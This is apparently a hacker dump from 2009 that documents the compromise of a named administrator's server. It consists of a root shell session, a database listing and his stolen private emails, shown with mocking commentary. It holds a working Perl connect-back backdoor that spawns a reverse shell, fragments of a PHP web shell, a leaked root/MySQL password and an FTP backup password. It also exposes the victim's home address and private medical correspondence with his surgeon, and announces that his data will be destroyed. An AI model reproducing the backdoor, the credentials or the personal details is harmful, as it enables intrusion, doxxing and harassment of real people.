19 ryb ryb 4096 Jun 9 01:11 .. -rwxrwxrwx 1 ryb ryb 13471 Sep 16 2007 1.tar.gz -rw-r--r-- 1 ryb ryb 0 Jul 26 2004 404.shtml drwxr-xr-x 9 ryb ryb 4096 Jun 16 2008 administrator -rw-r--r-- 1 ryb ryb 621 Jun 29 2004 agreement.html -rw-r--r-- 1 ryb ryb 29 Nov 3 2006 a.php -rw-r--r-- 1 ryb ryb 5029 Jul 10 2007 avatar.gif -rwxrwxrwx 1 ryb ryb 26648 Jun 7 2007 avatar.jpg -rw-r--r-- 1 ryb ryb 815 Jun 29 2004 bandwidth_exceed.html drwxrwxrwx 2 ryb ryb 4096 Jun 16 2008 cache -rw-r--r-- 1 ryb ryb 1363 Jun 15 2004 cache.php -rw-r--r-- 1 ryb ryb 17603 Aug 10 2006 celica2.jpg -rw-r--r-- 1 ryb ryb 93142 Aug 10 2006 celica.jpg drwxr-xr-x 2 ryb ryb 4096 Jun 16 2008 cgi-bin -rw-r--r-- 1 ryb ryb 87954 Aug 28 2006 CHANGELOG.php -rw-r--r-- 1 ryb ryb 515722 Dec 7 2004 check.jpg -rw-r--r-- 1 ryb ryb 28942 Mar 12 2006 ci8.torrent -rw-r--r-- 1 ryb ryb 746 Jan 26 2007 cmd.txt -rw-r--r-- 1 ryb ryb 1114 Jun 15 2004 code.php drwxrwxrwx 17 ryb ryb 4096 Jun 16 2008 components -rw-r--r-- 1 ryb ryb 553 Jun 24 2007 config.php -rw-rw-rw- 1 ryb ryb 2625 Nov 19 2006 configuration.php -rw-r--r-- 1 ryb ryb 259 Jun 27 2006 cook.php -rw-r--r-- 1 ryb ryb 3429 Aug 28 2006 COPYRIGHT.php -rw-r--r-- 1 ryb ryb 62050 Feb 18 2006 cover.jpg drwxr-xr-x 6 ryb ryb 4096 Jun 16 2008 data -rw-r--r-- 1 ryb ryb 730 Jan 26 2007 dc.pl -rw-r--r-- 1 ryb ryb 10664 Feb 10 2005 decrypt.php -rw-r--r-- 1 ryb ryb 857 Aug 3 2004 default.css -rw-r--r-- 1 ryb ryb 271191 Sep 29 2004 diafores.swf -rw-r--r-- 1 ryb ryb 32737 Aug 24 2004 DVD.html drwxr-xr-x 2 ryb ryb 4096 Jun 16 2008 editor -rw-r--r-- 1 ryb ryb 1275 Aug 16 2004 error_log -rw-r--r-- 1 ryb ryb 38858 Apr 20 2005 external.zip -rw-r--r-- 1 ryb ryb 1873 Feb 10 2005 flashfxp.php -rw-r--r-- 1 ryb ryb 61440 Feb 6 2005 Formmail2000Version3.0.tar drwxr-xr-x 2 ryb ryb 4096 Feb 8 2006 forum drwxr-xr-x 2 ryb ryb 4096 Dec 4 2005 freebsd drwxr-xr-x 2 ryb ryb 4096 Jun 16 2008 glafkos -rw-r--r-- 1 ryb ryb 29440 Apr 12 2006 glafkos.jpg -rw-r--r-- 1 ryb ryb 3535 Oct 11 2006 globals.php drwxr-xr-x 2 ryb ryb 4096 Jun 17 2004 Google -rw-r--r-- 1 ryb ryb 7694 Jun 15 2004 GoogleSearch.wsdl -rw-r--r-- 1 ryb ryb 0 Mar 4 2006 gv_system_702.zip drwxr-xr-x 3 ryb ryb 4096 Jun 16 2008 help -rw-r--r-- 1 ryb ryb 20270 Nov 17 2004 history.out -rw-r--r-- 1 ryb ryb 258 Jun 27 2006 horde.php -rw-r--r-- 1 ryb ryb 0 Jan 28 2007 .htaccess -rw-r--r-- 1 ryb ryb 5011 Oct 11 2006 .htaccess.bk -rw-r--r-- 1 ryb ryb 1915 Feb 13 2005 http.php drwxrwxrwx 9 ryb ryb 4096 Jun 16 2008 images drwxr-xr-x 2 ryb ryb 4096 Jun 16 2008 img drwxr-xr-x 10 ryb ryb 4096 Jun 16 2008 includes -rw-r--r-- 1 ryb ryb 335 Nov 3 2006 index2.html -rw-r--r-- 1 ryb ryb 4831 Aug 28 2006 index2.php -rw-r--r-- 1 ryb ryb 1729 Dec 17 2006 index.php -rw-r--r-- 1 ryb ryb 7193 Aug 28 2006 index.php.old -rw-r--r-- 1 ryb ryb 190965 Apr 3 2007 infosec.PNG -rw-r--r-- 1 ryb ryb 4374 Aug 28 2006 INSTALL.php -rwxrwxrwx 1 ryb ryb 251 Sep 21 2004 introbuilderuser.db drwxrwxrwx 7 ryb ryb 4096 Jun 16 2008 introusers -rw-r--r-- 1 ryb ryb 595 Nov 12 2004 ip.php -rw-rw-rw- 1 ryb ryb 21 Nov 12 2004 ip.txt -rw-r--r-- 1 ryb ryb 2918 Nov 12 2005 JCreator.torrent drwxrwxrwx 2 ryb ryb 4096 Jun 16 2008 language -rw-r--r-- 1 ryb ryb 6945 Jan 31 2005 level12.html drwxr-xr-x 2 ryb ryb 4096 Jun 16 2008 lib -rw-r--r-- 1 ryb ryb 17977 Aug 28 2006 LICENSE.php -rw-rw-rw- 1 ryb ryb 110386 Jun 9 04:23 log.txt -rw-r--r-- 1 ryb ryb 710 Aug 28 2006 mainbody.php -rw-r--r-- 1 ryb ryb 0 Jul 16 2004 main.html drwxrwxrwx 7 ryb ryb 4096 Jun 16 2008 mambots -rw-r--r-- 1 ryb ryb 9245 Apr 12 2006 me8.jpg drwxrwxrwx 2 ryb ryb 4096 Jun 16 2008 media drwxrwxrwx 2 ryb ryb 4096 Jun 16 2008 modules -rw-r--r-- 1 ryb ryb 68341 Apr 12 2006 mynewcar.jpg -rw-r--r-- 1 ryb ryb 343857 Nov 5 2005 mypc.jpg -rw-r--r-- 1 ryb ryb 193468 Jun 15 2004 nusoap.php -rw-r--r-- 1 ryb ryb 162383 Jun 27 2006 nwo.txt -rw-r--r-- 1 ryb ryb 2474 Aug 28 2006 offlinebar.php -rw-r--r-- 1 ryb ryb 3808 Aug 28 2006 offline.php drwxr-xr-x 5 ryb ryb 4096 Jun 16 2008 online -rw-r--r-- 1 ryb ryb 709 Aug 28 2006 pathway.php drwxr-xr-x 2 ryb ryb 4096 Jun 16 2008 php drwxr-xr-x 10 ryb ryb 4096 Jun 16 2008 phpBB drwxr-xr-x 10 ryb ryb 4096 Jun 16 2008 Project drwxrwxrwx 2 ryb ryb 4096 Jun 16 2008 rapid -rw-r--r-- 1 ryb ryb 66560 May 1 2003 revealer.exe -rw-r--r-- 1 ryb ryb 286 Aug 28 2006 robots.txt -rw-r--r-- 1 ryb ryb 430775 Jun 20 2004 rockxp.exe -rw-r--r-- 1 ryb ryb 37058 Nov 23 2004 rst_sql.php -rw-r--r-- 1 ryb ryb 137349 Nov 24 2005 sample.jpg -rw-r--r-- 1 ryb ryb 4055 Jun 15 2004 search.php -rw-r--r-- 1 ryb ryb 31 Jun 3 2007 shell.txt -rw-r--r-- 1 ryb ryb 1639 Jun 15 2004 showcache.js drwxr-xr-x 3 ryb ryb 4096 Jun 16 2008 sitebuilder drwxr-xr-x 5 ryb ryb 4096 Jun 16 2008 strover drwxr-xr-x 3 ryb ryb 4096 Jun 16 2008 teamproject drwxrwxrwx 4 ryb ryb 4096 May 9 12:17 templates -rw-r--r-- 1 ryb ryb 131021 Jun 15 2004 unicode-gb.tab -rw-r--r-- 1 ryb ryb 139264 Jun 21 2005 UStorageWin98Driver20.exe sh-3.1# cat a.php &1"); echo " $out "; ?> // ?? sh-3.1# cat cmd.txt */ $cmd = $_REQUEST['-cmd']; $history = $_REQUEST['history']; if(!$history) $history = 'HiSTORY ------------------------------------------------------'; if($cmd) $history .= "\n" . $cmd; header('text/html; charset=EUC-JP;'); ?> cmd.php
sh-3.1# cat configuration.php sh-3.1# cat cook.php Error:404 // :O ITS A TRAP 404!!!111ONEONEcos(0)1 sh-3.1# cat dc.pl #!/usr/bin/perl use Socket; print "Data Cha0s Connect Back Backdoor\n\n"; if (!$ARGV[0]) { printf "Usage: $0 [Host] \n"; exit(1); } print "[*] Dumping Arguments\n"; $host = $ARGV[0]; $port = 80; if ($ARGV[1]) { $port = $ARGV[1]; } print "[*] Connecting...\n"; $proto = getprotobyname('tcp') || die("Unknown Protocol\n"); socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n"); my $target = inet_aton($host); if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) { die("Unable to Connect\n"); } print "[*] Spawning Shell\n"; if (!fork( )) { open(STDIN,">&SERVER"); open(STDOUT,">&SERVER"); open(STDERR,">&SERVER"); exec {'/bin/sh'} '-bash' . "\0" x 4; exit(0); } print "[*] Datached\n\n"; sh-3.1# head decrypt.php sh-3.1# cat shell.txt // Next! sh-3.1# mysql Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 105984 Server version: 5.0.77-community MySQL Community Edition (GPL) Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> show databases; +---------------------------+ | Database | +---------------------------+ | information_schema | | ariadmin_metoxa | | ariadmin_redesign | | ariadmin_script | | ariadmin_sfinxtrade | | cphulkd | | crownvip_site | | defaultp_milworm | | defaultp_ports | | eximstats | | glafcom_blog | | horde | | indianos_blueinstinct | | indianos_silentfreediver | | infosec2_hash | | infosec_acms | | infosec_ads | | infosec_cms | | infosec_cracker | | infosec_dp | | infosec_exam | | infosec_forms | | infosec_ip2country | | infosec_is | | infosec_isu | | infosec_md5 | | infosec_milworm | | infosec_phpfunctions | | infosec_wp | | itkb_itkb | | leechprotect | | modsec | | mysql | | nowayin_archonmodelagency | | nowayin_avpower | | nowayin_casino | | nowayin_ctspropertiescy | | nowayin_law | | nowayin_magazaki | | nowayin_plantruck | | nowayin_rainbowgalleryart | | nowayin_rent | | nowayin_sportscafe | | nowayin_tabacaleratroya | | nowayin_traveltest | | roundcube | | royallim_site | | ryb_ab | | ryb_db | | ryb_dbstore | | ryb_estate | | ryb_joomla | | ryb_mail | | ryb_mysql | | ryb_phpbb1 | | ryb_site | | test | | webhostl_billing | | webhostl_hosting | | webhostl_site | | webtech_eventbook | | webtech_redseal | | x00mario_lockr | +---------------------------+ 63 rows in set (0.00 sec) // We looked through most of his databases. They have nothing but hashes, milw0rm rips and a couple of users. // I don't think he will mind us dropping them ^^ sh-3.1# cd sh-3.1# ls -la total 216 drwxr-x--- 16 root root 4096 Jun 9 05:10 . drwxr-xr-x 26 root root 4096 May 27 00:09 .. -rw------- 1 root root 1006 Dec 31 2003 anaconda-ks.cfg -rw------- 1 root root 13155 Jun 8 16:46 .bash_history -rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout -rw-r--r-- 1 root root 313 Jul 25 2008 .bash_profile -rw-r--r-- 1 root root 333 Jul 25 2008 .bashrc drwxr-xr-x 4 root root 4096 Jul 25 2008 .cpanel drwxr-xr-x 4 root root 4096 Jul 25 2008 cpanel3-skel drwx------ 3 root root 4096 Jul 25 2008 .cpobjcache -rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc drwxr-xr-x 8 root root 4096 Apr 8 16:55 downloads drwx------ 3 root root 4096 Dec 31 2003 .gconf drwx------ 2 root root 4096 Dec 31 2003 .gconfd drwx------ 2 root root 4096 Mar 16 18:25 .gnupg -rw-r--r-- 1 root root 9089 Jun 19 2008 hninst.sh.1 -rw-r--r-- 1 root root 21743 Dec 31 2003 install.log -rw-r--r-- 1 root root 4060 Dec 31 2003 install.log.syslog -rw------- 1 root root 35 Nov 7 2008 .lesshst drwx------ 6 root root 4096 Jul 25 2008 .MirrorSearch -rw------- 1 root root 39 Jul 25 2008 .my.cnf -rw------- 1 root root 220 Jun 9 04:57 .mysql_history drwxr-xr-x 2 root root 4096 Nov 2 2008 .ncftp -rw-r--r-- 1 root root 264 May 27 00:09 .pearrc drwxr-xr-x 2 root root 4096 Jul 25 2008 public_ftp drwxr-xr-x 3 root root 4096 Jul 25 2008 public_html -rw------- 1 root root 1024 Mar 25 00:04 .rnd -rw------- 1 root root 0 Nov 21 2008 .securesslreqs -rwxr-xr-x 1 root root 554 May 23 2008 sks.pl drwx------ 3 root root 4096 Jul 25 2008 .spamassassin drwx------ 2 root root 4096 Jul 25 2008 .ssh -rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc drwxr-xr-x 3 root root 4096 Nov 27 2008 tmp -rw------- 1 root root 0 Nov 21 2008 .trustwavereqs sh-3.1# cat .bash_history rm md5.TMD ls df -h ls -la myisamchk -q -r -f -s *.MYI exit clear ps -aux |grep mysql mysql -v df -h cd /var/lib/mysql/infosec_md5/ ls ls -la myisamchk -r -s *.MYI ping 10.0.7.198 [snip] nmap -v -P0 unesco.org.uk /etc/apf/afp -f /etc/apf -f /etc/apf/apf -f nmap -v -P0 unesco.org.uk nmap -v -P0 diatrofologos.com nmap -v -P0 www.diatrofologos.com nmap -v -P0 -p 21 www.diatrofologos.com nmap -v -P0 -p 22 www.diatrofologos.com nmap -v -P0 -p 80 www.diatrofologos.com /etc/apf/apf -t /etc/apf/apf /etc/apf/apf -r ls cd /etc/apf ls cat allow_hosts.rules nano allow_hosts.rules ./apf -r nano allow_hosts.rules ./apf -r exit [snip] /etc/apf/apf -f nmap -v -sV -P0 94.65.66.61 who last lastlog last last last cd /var/log/ ls ls -la /etc/apf/apf -t /etc/apf/apf -r [snip] cat .my.cnf ls cd $hme cd $home crntab -l crontab -l sh /root/downloads/remoteftpbackup/ftpbackup.sh | mail -s "Daily Remote Backup Complete" glafkos@gmail.com sh /root/downloads/remoteftpbackup/ftpbackup.sh ls cd .. [snip] /sbin/ifconfig cd / cd root ls cd downloads/ ls nano ping.sh chmod +x ping.sh sh ping.sh ping chmod +x ping.sh > test.txt sh ping.sh > test.txt wc -l test.txt nano test.txt cat test.txt ping 66.96.220.217 [snip] nano includes/vars.inc.php ls -la ls -la includes/vars.inc.php nmap -v -sV -P0 mail.sobohgroup.com /etc/apf/apf -f nmap -v -sV -P0 mail.sobohgroup.com nmap -v -sV -P0 mail.sobohgroup.com [snip] cat ftpbackup.sh ftp nowayout.myftp.org lynx whatismyip.com ifconfig -a /sbin/ifconfig ftp nowayout.myftp.org nmap -v -p 21 nowayout.myftp.org nmap -v -p 21 -P0 nowayout.myftp.org nmap -v -p 21 -P0 nowayout.myftp.org nmap -v -p 21 -P0 nowayout.myftp.org nmap -v -p 21 -P0 nowayout.myftp.org [snip] rdesktop rdesktop -k en-us -a 16 -u username -p "password" ipaddress rdesktop -F rdesktop -F server [snip] df -h nmap -v -sV -P0 -O gcontrol.redirectme.net /etc/apf/apf -a /etc/apf/apf -f clear nmap -v -sV -P0 -O gcontrol.redirectme.net [snip] nmap -v -sV -P0 -O gcontrol.redirectme.net /etc/apf/apf -a /etc/apf/apf -f clear nmap -v -sV -P0 -O gcontrol.redirectme.net nmap -v -sV -O gcontrol.redirectme.net nmap -v -sV -P0 -O gcontrol.servegame.com nmap -v -P0 -sV cypt-45.no-ip.biz nmap -v -P0 -sV cypt-27.no-ip.biz [snip] /etc/apf/apf -f nmap -v -sV -p 1-65535 -P0 195.97.106.88 -oN /home/itkb/www/nmap.txt nmap -v -sV -p 1-65535 -P0 195.97.106.88 -oN /home/itkb/www/nmap.txt & nmap -sV -p 22 -P0 195.97.106.88 nmap -sV -p 23 -P0 195.97.106.88 telnet 195.97.106.88 23 telnet 195.97.106.88 22 telnet gcontrol.servegame.com 22 ping gcontrol.servegame.com telnet gcontrol.servegame.com 23 srshaxsir at hushmail Jun 4, 2009, 6:58 PM Post #1 of 1 (70 views) nmap -v -P0 gcontrol.servegame.com /etc/apf/apf -f nmap -v -P0 gcontrol.servegame.com telnet gcontrol.servegame.com 23 telnet gcontrol.servegame.com 22 srshaxsir at hushmail Jun 4, 2009, 6:58 PM Post #1 of 1 (70 views) nmap -v -P0 gcontrol.servegame.com /etc/apf/apf -f nmap -v -P0 gcontrol.servegame.com telnet gcontrol.servegame.com 23 telnet gcontrol.servegame.com 22 [snip] srshaxsir at hushmail srshaxsir at hushmail <---- Told you he was snooping around.. sh-3.1# cat .my.cnf [client] user="root" pass="r4-h121!@#" <--- His MySQL root password is the same as the root account password, you sir, are an idiot. sh-3.1# cd downloads sh-3.1# ls -la total 1032 drwxr-xr-x 8 root root 4096 Apr 8 16:55 . drwxr-x--- 16 root root 4096 Jun 9 05:21 .. drwxr-x--- 3 root root 4096 Jul 29 2008 apf -rw-r--r-- 1 root root 105310 Jul 30 2008 apf-current.tar.gz drw-r--r-- 3 root root 4096 Jul 30 2008 bfd-1.2 -rw-r--r-- 1 root root 17212 Jul 30 2008 bfd-current.tar.gz drwxr-xr-x 2 1000 1000 4096 Dec 17 2007 chkrootkit -rw-r--r-- 1 root root 38323 Jul 25 2008 chkrootkit.tar.gz -rw-r--r-- 1 root root 1348 Sep 16 2004 ftpbackup.tar.gz drwxr-xr-x 14 root wheel 4096 Nov 2 2008 ncftp-3.2.2 -rw-r--r-- 1 root root 540436 Nov 2 2008 ncftp-3.2.2-src.tar.gz -rwxr-xr-x 1 root root 122 Mar 16 17:03 ping.sh drwxr-xr-x 4 root root 4096 Apr 8 16:57 rdesktop-1.6.0 -rw-r--r-- 1 root root 284728 May 11 2008 rdesktop-1.6.0.tar.gz drwxr-xr-x 2 32170 32171 4096 Nov 2 2008 remoteftpbackup -rw-r--r-- 1 root root 220 Mar 16 17:04 test.txt // -_-' all of that, and he still couldn't secure the box.... sh-3.1# cat ping.sh #!/bin/bash for ip in $(seq 1 254);do ping -c 1 66.96.220.$ip | grep "bytes from" | cut -d" " -f4 | cut -d ":" -f1 & done sh-3.1# cat test.txt 66.96.220.1 66.96.220.209 66.96.220.209 66.96.220.39 66.96.220.97 66.96.220.209 66.96.220.133 66.96.220.161 66.96.220.209 66.96.220.182 66.96.220.209 66.96.220.213 66.96.220.214 66.96.220.215 66.96.220.216 66.96.220.217 sh-3.1# cd remoteftpbackup sh-3.1# ls -la total 12 drwxr-xr-x 2 32170 32171 4096 Nov 2 2008 . drwxr-xr-x 8 root root 4096 Apr 8 16:55 .. -rwxr-xr-x 1 root root 678 Apr 10 05:20 ftpbackup.sh sh-3.1# cat ftpbackup.sh #!/bin/bash # Remote FTP Backup Script # Author: Charalambous Glafkos # Contact: glafkos@itsolutionskb.com # Visit: http://www.itsolutionskb.com # Copyright 2008 IT Solutions KB FTPStatus=y HOST='nowayout.myftp.org' USERNAME='backup' PASSWORD='b4ckup$#' REMOTEDIR=`date +'%d-%m-%Y'` HOSTNAME='/bin/hostname' LOCALDIR='/home/backups/cpbackup/daily' [snip] // lol. we are going to move to his Gmail account now :] -------------------------------- [ glafkos@gmail.com ] -------------------------------- Return-Path: From: "Glafkos Charalambous" To: "'Edward Lansink'" Subject: RE: [IT Solutions Knowledge Base] Network security Hello Edward, This is my PayPal address paypal@webhostline.com Sorry for delay but we have huge problem with Astalavista.com/.net Some script kiddies hacked us and we are trying to recover everything back.. http://kotrotsos.com/wp-content/uploads/2009/06/astalavista.txt It seems that an 0day Light Speed Exploit was used .. from there on was a piece of cake.. // You called us script kiddies, we are reading your email, we rooted your box while you were logged on it, we took everything and in a minute it will all be -gone-. ############################################################################ Delivered-To: glafkos@gmail.com Return-Path: Subject: RE: [IT Solutions Knowledge Base] Network security Date: Mon, 8 Jun 2009 09:51:14 +0200 From: "Edward Lansink" To: "Glafkos Charalambous" Hi Glafkos, I hadn't had a chance to look at your email before, sorry for the late reply! I just sent over payment by Paypal, can you please confirm you received it? Sorry to hear you're having trouble with Astalavista.com. I didn't know you're part of that project as well... I think we used to advertise there a while back but although there was interest in LANguard it didn't do much commercially (for obvious reasons). Hope you guys manage to recover everything! Best regards, Edward Lansink GFI Software - www.gfi.com ############################################################################ Return-Path: Subject: RE: [IT Solutions Knowledge Base] Network security Date: Mon, 8 Jun 2009 11:03:51 +0300 Hello Edward, I received the payment of 240 USD for 3 months trial advertisement as we agreed. Thank you for your kind words. We are working to recover everything. Owner and friend of mine Pascal is outside country for 10 days due to a congress and we will have to wait for him to come back to proceed. We are thinking to change everything and start with new approach and new ideas but we will see.. I already track down the guy behind that but not 100% sure yet. There is also one guy inside Astalavista stuff responsible but I don't want to speak a lot yet :) Kindly Regards, Glafkos // That sir, is what you got you owned... stop poking around. ############################################################################ Date: Mon, 8 Jun 2009 14:16:15 +0300 Delivered-To: glafkos@gmail.com Subject: Glafkos Process From: Glafkos Charalambous To: Milorad Mitkovic --001636c5a53ce0251a046bd45ed9 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hello Dr, I am 6cm taller today.. its been the last 2 months I am clicking in a slow rate of 3 clicks per day and i do some breaks. I walk before and after each click and do some stretching on the walker. When I go out for a cofee or something I take the car and I walk from the car to the coffee for 100-200 meters. I need your advice so I can avoid missalignment as I had already talk with Nicolai and I am little worried. Could you please give me more advices as I want not to have any complications? Thanks Glafkos // lol! ############################################################################ Delivered-To: glafkos@gmail.com Received: by 10.223.104.212 with SMTP id q20cs227739fao; Mon, 8 Jun 2009 11:54:18 -0700 (PDT) MIME-Version: 1.0 Received: by 10.223.119.207 with SMTP id a15mr4580765far.11.1244487257201; Mon, 08 Jun 2009 11:54:17 -0700 (PDT) In-Reply-To: <4b20eb360906080416l634677c1g7188be64b8102868@mail.gmail.com> References: <4b20eb360906080416l634677c1g7188be64b8102868@mail.gmail.com> Date: Mon, 8 Jun 2009 20:54:17 +0200 Message-ID: Subject: Re: Glafkos Process From: Milorad Mitkovic To: Glafkos Charalambous Content-Type: multipart/alternative; boundary=001636c5bd8ce49c8e046bdac469 --001636c5bd8ce49c8e046bdac469 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hi Mr. Glafkos, Congratulations. It is good to do 3 per day and to do breaks. There is no special advice to avoid misalignment. In some people muscles do not allow further lengthening and produce misalignment. If you discover any deformity when standing (''O'' or ''X'' deformity or bumping) please inform me or send a picture. Best regards Dr. Milorad Mitkovic ############################################################################ Return-Path: Received: from UiBSSupport ([91.184.220.239]) by mx.google.com with ESMTPS id 10sm672260eyd.52.2009.06.08.17.17.01 (version=SSLv3 cipher=RC4-MD5); Mon, 08 Jun 2009 17:17:02 -0700 (PDT) From: "Glafkos Charalambous" To: "'Milorad Mitkovic'" References: <4b20eb360906080416l634677c1g7188be64b8102868@mail.gmail.com> In-Reply-To: Subject: RE: Glafkos Process Date: Tue, 9 Jun 2009 03:16:47 +0300 Message-ID: <003001c9e897$95610900$c0231b00$@com> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0031_01C9E8B0.BAAE4100" X-Mailer: Microsoft Office Outlook 12.0 Thread-Index: AcnoaoamxH4tbvYJR4uFMqwH5OF5CgALNw+Q Content-Language: en-us This is a multi-part message in MIME format. ------=_NextPart_000_0031_01C9E8B0.BAAE4100 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Hello Dr, Thanks for the advice.. What do u mean by: If you discover any deformity when standing (''O'' or ''X'' deformity or bumping) Can you explain me more simple please? As I did not understand.. I still have more muscle but I do not want to cause any problems:) Thanks Glafkos // You will never get to see his response Glafkos, never. ############################################################################ Delivered-To: glafkos@gmail.com Received: by 10.223.119.65 with SMTP id y1cs56459faq; Fri, 22 May 2009 06:03:03 -0700 (PDT) Received: by 10.115.107.1 with SMTP id j1mr7755390wam.149.1242997258498; Fri, 22 May 2009 06:00:58 -0700 (PDT) Return-Path: Received: from srv01.webhostline.com ([66.96.220.213]) by mx.google.com with ESMTP id 37si3701375pzk.85.2009.05.22.06.00.57; Fri, 22 May 2009 06:00:58 -0700 (PDT) Received-SPF: neutral (google.com: 66.96.220.213 is neither permitted nor denied by best guess record for domain of nobody@srv01.webhostline.com) client-ip=66.96.220.213; Authentication-Results: mx.google.com; spf=neutral (google.com: 66.96.220.213 is neither permitted nor denied by best guess record for domain of nobody@srv01.webhostline.com) smtp.mail=nobody@srv01.webhostline.com Received: from nobody by srv01.webhostline.com with local (Exim 4.69) (envelope-from ) id 1M7UKn-0007c5-Hw for info@itsolutionskb.com; Fri, 22 May 2009 08:58:49 -0400 To: Administrator Subject: [IT Solutions Knowledge Base] Network security MIME-Version: 1.0 Content-Type: text/plain; charset="UTF-8" From: WordPress Reply-To: Edward Lansink X-Mailer: PHP/5.2.6 Message-Id: Date: Fri, 22 May 2009 08:58:49 -0400 X-AntiAbuse: This header was added to track abuse, please include it with any abuse report X-AntiAbuse: Primary Hostname - srv01.webhostline.com X-AntiAbuse: Original Domain - itsolutionskb.com X-AntiAbuse: Originator/Caller UID/GID - [99 99] / [47 12] X-AntiAbuse: Sender Address Domain - srv01.webhostline.com Hi Glafkos, I noticed the posts in the Network security category provide tutorial style info about a few network security tools and I was wondering whether you'd be interested in having a look at GFI LANguard (www.gfi.com/lannetscan). It's a network vulnerability scanner like Nessus and also does patch management and network auditing. There's a freeware version available now (full functionality for up to 5 IPs) and maybe that makes it more interesting for your blog readers. If you like I can give you a full 12-month license key so you can test it out on larger networks. You can keep the key and there are no strings attached - you're not committing to anything! I hope it's of interest to you and I look forward to hearing from you. Keep up the good work on the blog! Best regards, Edward Lansink - GFI Software --- Website: www.gfi.com --- IP address: http://ws.arin.net/whois/?queryinput=78.133.123.235 Form referrer: http://www.itsolutionskb.com/contact-us/ Orig. referrer: http://www.itsolutionskb.com/ User agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3 ############################################################################ MIME-Version: 1.0 Received: by 10.223.119.65 with HTTP; Fri, 22 May 2009 06:29:13 -0700 (PDT) In-Reply-To: References: Date: Fri, 22 May 2009 16:29:13 +0300 Delivered-To: glafkos@gmail.com Message-ID: <4b20eb360905220629yab2e60dn6473432f121e0664@mail.gmail.com> Subject: Re: [IT Solutions Knowledge Base] Network security From: Glafkos Charalambous To: Edward Lansink Content-Type: multipart/alternative; boundary=001636c5ac930d0407046a803f16 --001636c5ac930d0407046a803f16 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hello Edward, I would be interested to have a license key to try it out on my companies that I manage. I am sure that it would be nice also to write some articles about it on my website. Thank you for contacting us Regards, Glafkos ############################################################################ Delivered-To: glafkos@gmail.com Received: by 10.223.119.65 with SMTP id y1cs60262faq; Fri, 22 May 2009 06:44:03 -0700 (PDT) Received: by 10.86.90.2 with SMTP id n2mr3106987fgb.61.1242999842751; Fri, 22 May 2009 06:44:02 -0700 (PDT) Return-Path: Received: from smtpmt01.gfi.com (smtpmt01.gfi.com [78.133.123.219]) by mx.google.com with ESMTP id e11si983627fga.6.2009.05.22.06.44.02; Fri, 22 May 2009 06:44:02 -0700 (PDT) Received-SPF: pass (google.com: domain of ELansink@gfi.com designates 78.133.123.219 as permitted sender) client-ip=78.133.123.219; Authentication-Results: mx.google.com; spf=pass (google.com: domain of ELansink@gfi.com designates 78.133.123.219 as permitted sender) smtp.mail=ELansink@gfi.com Content-Class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C9DAE3.60B786F6" X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.4325 Subject: RE: [IT Solutions Knowledge Base] Network security Date: Fri, 22 May 2009 15:44:10 +0200 Message-ID: In-Reply-To: <4b20eb360905220629yab2e60dn6473432f121e0664@mail.gmail.com> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: [IT Solutions Knowledge Base] Network security thread-index: Acna4VJRnwVccV/2RaGKPPNPMjKNBwAAWBsA References: <4b20eb360905220629yab2e60dn6473432f121e0664@mail.gmail.com> From: "Edward Lansink" To: "Glafkos Charalambous" This is a multi-part message in MIME format. ------_=_NextPart_001_01C9DAE3.60B786F6 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Hi Glafkos, Thanks for your quick reply and for your interest in GFI LANguard. I'm about to request a license key for you - Can I just ask you for the following info? This is purely procedural, to keep a log of the owners of license keys and we won't use your personal details for anything else. Address: Zip/postal code: City: Country: I expect to be able to send you a license key + download links and links to manuals & further info on Monday. Have a good weekend and thanks again for having a look at GFI LANguard! Best regards, Edward Edward Lansink GFI Software - www.gfi.com ############################################################################ MIME-Version: 1.0 Received: by 10.223.119.65 with HTTP; Fri, 22 May 2009 06:54:50 -0700 (PDT) In-Reply-To: References: <4b20eb360905220629yab2e60dn6473432f121e0664@mail.gmail.com> Date: Fri, 22 May 2009 16:54:50 +0300 Delivered-To: glafkos@gmail.com Message-ID: <4b20eb360905220654l23dc52aap72954c65559f8b6b@mail.gmail.com> Subject: Re: [IT Solutions Knowledge Base] Network security From: Glafkos Charalambous To: Edward Lansink Content-Type: multipart/alternative; boundary=00163662e5dbac24fe046a809aa7 --00163662e5dbac24fe046a809aa7 Content-Type: text/plain; charset=windows-1252 Content-Transfer-Encoding: quoted-printable Hello Edward, Thank you for your prompt response My Details are: Address: Kritis 21 Zip/Postal: 3087 City: Limassol Country: Cyprus Would you be interested to be advertised on IT Solutions Knowledge Base Header ? Best Regards, Glafkos ############################################################################ Delivered-To: glafkos@gmail.com Received: by 10.223.119.65 with SMTP id y1cs61895faq; Fri, 22 May 2009 07:03:35 -0700 (PDT) Received: by 10.86.51.10 with SMTP id y10mr3164548fgy.9.1243001015426; Fri, 22 May 2009 07:03:35 -0700 (PDT) Return-Path: Received: from smtpmt01.gfi.com (smtpmt01.gfi.com [78.133.123.219]) by mx.google.com with ESMTP id l12si2733149fgb.1.2009.05.22.07.03.04; Fri, 22 May 2009 07:03:35 -0700 (PDT) Received-SPF: pass (google.com: domain of ELansink@gfi.com designates 78.133.123.219 as permitted sender) client-ip=78.133.123.219; Authentication-Results: mx.google.com; spf=pass (google.com: domain of ELansink@gfi.com designates 78.133.123.219 as permitted sender) smtp.mail=ELansink@gfi.com Content-Class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C9DAE6.09D781FE" X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.4325 Subject: RE: [IT 